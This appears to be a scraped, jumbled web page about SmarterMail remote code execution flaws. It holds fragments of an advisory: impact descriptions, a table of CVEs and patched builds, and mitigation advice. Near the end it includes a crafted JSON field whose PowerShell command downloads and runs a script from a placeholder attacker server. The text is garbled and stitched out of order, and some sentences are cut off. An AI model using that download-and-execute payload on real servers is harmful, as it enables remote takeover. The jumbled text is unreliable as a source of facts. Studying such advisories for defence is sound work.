This public link is valid for 7 days and shares a thread, including any personal information you added. This link or copies made by others cannot be deleted. If you share with third parties, their policies apply. Can’t copy the link right now. Try again later. smartermail_rce.md - GitHub
SmarterTools released to address this. The fix involved:
In February 2022, the first in-the-wild attacks were observed, deploying webshells and cryptominers. Shodan scans at the time revealed over 12,000 exposed SmarterMail instances, many unpatched. smartermail 6919 exploit
Attackers can use the compromised server as a pivot point to attack other internal networks.
If an emergency patch cannot be immediately deployed due to system dependencies, network administrators must block external traffic to the remoting infrastructure: smartermail_rce.md - GitHub This public link is valid for 7 days
: With system-level rights, malicious actors can manipulate registry keys, drop secondary payloads (such as web shells or ransomware), dump Active Directory credentials from memory, and use the server as an internal launching pad to pivot laterally across the corporate enterprise network.
Because the backend service handles these administrative endpoints with high privileges, successful execution occurs under the context. This grants full administrative control over the underlying Windows host machine. Impact of System Compromise Can’t copy the link right now
| Date | Vulnerability | Build Affected | Patch | |------|---------------|----------------|-------| | August 2019 | CVE‑2019‑7211,‑7212,‑7213,‑7214 | Build < 6985 (including ) | Build 6985 | | October 2025 | CVE‑2025‑52691 (File Upload RCE) | Build 9406 and earlier | Build 9413 | | January 15, 2026 | CVE‑2026‑23760 (Auth Bypass) | Build < 9511 | Build 9511 | | January 15, 2026 | CVE‑2026‑24423 (ConnectToHub RCE) | Build < 9511 | Build 9511 |
"MountPath": "/temp", "commandMount": "powershell.exe -c IEX(New-Object Net.WebClient).DownloadString('http://attacker-server/payload.ps1')"
An attacker could send a crafted POST request to ExecuteCommand with a Command value like: